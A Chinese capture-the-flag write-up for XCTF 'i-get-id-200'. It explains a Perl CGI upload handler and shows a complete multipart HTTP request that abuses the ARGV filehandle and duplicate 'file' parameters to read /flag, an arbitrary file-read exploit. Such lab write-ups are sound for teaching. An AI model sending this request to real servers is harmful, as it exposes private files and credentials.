i-get-id-200

  • 题目描述

    嗯。。我刚建好了一个网站

  • 解题过程

    一共有三个页面

    • Hello World

      告诉了页面是perl写的

    • Forms

      输入name和age会返回渲染后的字符串

      搜了一下,perl不能ssti

    • File

      可以上传文件,上传成功后会打印文件内容

      感觉上传文件这里有漏洞,但是对perl环境很陌生,去看看相关的用法

    • 文件读取,并打印文件内容

      open(DATA, "<file.txt") or die "file.txt 文件无法打开, $!";
      
# DATA 为文件句柄用于读取文件
      
while(<DATA>){
      
   print "$_";
      
}

    • 文件上传

       #!/usr/bin/perl
      
 use CGI;
      
 my $cgi = new CGI;
      
 my $dir = 'sub';
      
 my $file = $cgi->param('file');
      
 $file=~m/^.*(\\|\/)(.*)/;
      
 # strip the remote path and keep the filename
      
 my $name = $2;
      
 open(LOCAL, ">$dir/$name") or print 'error';
      
 while(<$file>) {
      
    print LOCAL $_;
      
 }
      
 print $cgi->header();
      
 print $dir/$name;
      
 print "$file has been successfully uploaded... thank you.\n";enter code here

      没什么思路,去看了wp,网上wp清一色猜测后端代码。。。

      找到了源码(节选)

      if ($cgi->upload('file')) {
      
    my $file = $cgi->param('file');
      
    while (<$file>) {
      
        print "$_";
      
        print "<br />";
      
    }
      
}

      涉及几个知识点:

      • 这里需要用到ARGV,它是perl默认用来接收参数的数组,类似flask的request.argv
      • $cgi->param('file');会优先选取第一个file参数,类似于参数污染
      • 结合起来就会达到<$file> == ARGV[0]的效果,可以进行任意文件读取了
      POST /cgi-bin/file.pl?/flag HTTP/1.1
      
Host: 220.249.52.133:57967
      
Content-Length: 411
      
Cache-Control: max-age=0
      
Origin: http://220.249.52.133:57967
      
Upgrade-Insecure-Requests: 1
      
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      
Referer: http://220.249.52.133:57967/cgi-bin/file.pl?file=../file.pl
      
Accept-Encoding: gzip, deflate
      
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
      
Connection: close

------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"
      
Content-Type: text/plain

ARGV
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"; filename="draft.txt"
      
Content-Type: text/plain

asdasd
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="Submit!"

Submit!
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ--

      注意这里需要多加一组form数据来写ARGV

  • 参考

XCTF-i-get-id-200的更多相关文章

  1. [Android]Android端ORM框架——RapidORM(v2.0)

    以下内容为原创,欢迎转载,转载请注明 来自天天博客:http://www.cnblogs.com/tiantianbyconan/p/5626716.html [Android]Android端ORM ...

  2. SQL Server 深入解析索引存储(上)

    标签:SQL SERVER/MSSQL SERVER/数据库/DBA/索引体系结构/堆/聚集索引 概述 最近要分享一个课件就重新把这块知识整理了一遍出来,篇幅有点长,想要理解的透彻还是要上机实践. 聚 ...

  3. [开源ORM] SqliteSugar 3.x .net Core版本成功上线

    SqliteSqlSugar 3.X API 作为支持.NET CORE 为数不多的ORM之一,除了具有优越的性能外,还拥有强大的功能,不只是满足你的增,删,查和改.实质上拥有更多你想像不到的功能,当 ...

  4. 改善SQL语句(转)

    二.改善SQL语句          很多人不知道SQL语句在SQL SERVER中是如何执行的,他们担心自己所写的SQL语句会被SQL SERVER误解.比如:   select * from ta ...

  5. 转载:SqlServer数据库性能优化详解

    本文转载自:http://blog.csdn.net/andylaudotnet/article/details/1763573 性能调节的目的是通过将网络流通.磁盘 I/O 和 CPU 时间减到最小 ...

  6. mysql-批量修改表字段中的某一部分内容

    MySQL批量替换指定字段字符串语句(1)updat 表名 set 字段名=replac(字段名,'原来的内容','替换后的内容') 举一个例子,就是我实际操作的时候的命令: update cpg14 ...

  7. 记一次MYSQL更新优化

    引言 今天(August 5, 2015 5:34 PM)在给数据库中一张表的结构做一次调整,添加了几个字段,后面对之前的数据进行刷新,刷新的内容是:对其中的一个已有字段url进行匹配,然后更新新加的 ...

  8. A Quick Introduction to Linux Policy Routing

    A Quick Introduction to Linux Policy Routing 29 May 2013 In this post, I’m going to introduce you to ...

  9. 转载:postgresql分区与优化

    --对于分区表constraint_exclusion 这个参数需要配置为partition或on postgres=# show constraint_exclusion ; constraint_ ...

  10. 楼盘信息sq

    ID:1 楼盘名称:帝豪国际 网址:http://shangqiu.jiwu.com/loupan/239023.html 价格:2500元/平米 关注人数:497 地址:长寿大道南段 情况:在售 大 ...

随机推荐

  1. 通达OA 任意文件上传-2013/2015版本

    参考 http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/11.html 影响版本 2013版本 2015版本 漏洞文件 general/vmeet/wbU ...

  2. SpringMVC-04 数据处理及跳转

    SpringMVC-04 数据处理及跳转 结果跳转方式 1.ModelAndView 设置ModelAndView对象 , 根据view的名称 , 和视图解析器跳到指定的页面 . 页面 : {视图解析 ...

  3. python-实现输出乘法口诀表

    list1 = [1,2,3,4,5,6,7,8,9] 2 def number(num): 3 for i in list1[:num]: 4 result = 1 * i 5 print(&quo ...

  4. Jmeter socket接口测试

    一.Socket简介 什么是socket呢?我们经常把socket翻译为套接字,socket是在应用层和传输层之间的一个抽象层,它把 TCP/IP层复杂的操作抽象为几个简单的接口供应用层调用已实现进程 ...

  5. javaIO中的序列化和反序列化

    javaIO中的序列化和反序列化 1.什么是序列化?它是来解决什么问题的 1.我们创建的对象,一般情况下在内存中,程序关闭,或者因为没有地址指向而导致垃圾回收 2.这样,我们的对象就会丢失 3.那么我 ...

  6. 教你如何用Python模拟http请求(GET,POST)

    模拟http请求有什么用呢? 我们现在使用的所有需要使用网络的:软件 应用 app 网站里面的绝大部分功能都是通过http协议来工作的 什么是http协议? http协议,超文本传输协议(HTTP,H ...

  7. 一文搞懂如何实现 Go 超时控制

    为什么需要超时控制? 请求时间过长,用户侧可能已经离开本页面了,服务端还在消耗资源处理,得到的结果没有意义 过长时间的服务端处理会占用过多资源,导致并发能力下降,甚至出现不可用事故 Go 超时控制必要 ...

  8. 【死磕JVM】给同事讲了一遍GC后,他要去面试,年轻人,就是容易冲动!

    前言 在一个风和日丽的中午,和同事小勇一起走在公司楼下的小公园里面,看到很多的小姐姐,心想什么时候能够和这些小姐姐一起讨论人生呀,美滋滋,嘿嘿嘿. 收起你的哈喇子好不好,小勇总是在这个时候发出声音,挺 ...

  9. C++中的广义集合于for范围访问

    在C++11中可以通过for在范围循环中访问广义集合 如: std::vetcor v={1,2,3}; int a[4] {1,2,3,4}; std::array<int,4>a2 { ...

  10. Processing 状态机应用研究(线性转换)

    状态机(State Machine)是一个抽象概念,是一个逻辑严谨的数学抽象.它的这种概念在现实生活中处处都有应用,或者说现实世界就充满状态机.要讨论状态机,就涉及到相关概念,比如:State 状态, ...